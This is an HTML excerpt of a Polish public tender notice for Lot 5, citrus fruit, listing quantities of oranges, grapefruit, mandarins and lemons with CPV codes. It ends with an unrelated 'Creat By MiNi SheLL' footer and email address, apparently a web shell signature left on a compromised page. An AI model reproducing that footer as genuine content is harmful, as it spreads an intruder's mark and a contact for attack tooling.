<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET nr V. Owoce cytrusowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (Kg.)	kwota netto
za j.m. (Kg.)	wartość netto
	VAT	wartość brutto
1.	Pomarańcza                                                                 /waga 1 szt. = około250g/, (opakowanie zbiorcze 5 - 10kg)	03222220-1	800 kg				
2.	Grapefruit                                          /waga 1 szt. = około 400g/,                                                               (opakowanie zbiorcze 9- 18 kg	03222230-4	700 kg				
3.	Mandarynka                                                                                               /waga 1 szt. = około150 g/,                                                                      (opakowanie zbiorcze 4.5 - 12kg)		50 kg				
4.	Cytryna                                                                           (opakowanie zbiorcze 1 - 5 kg)	03222210-8	110 kg				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com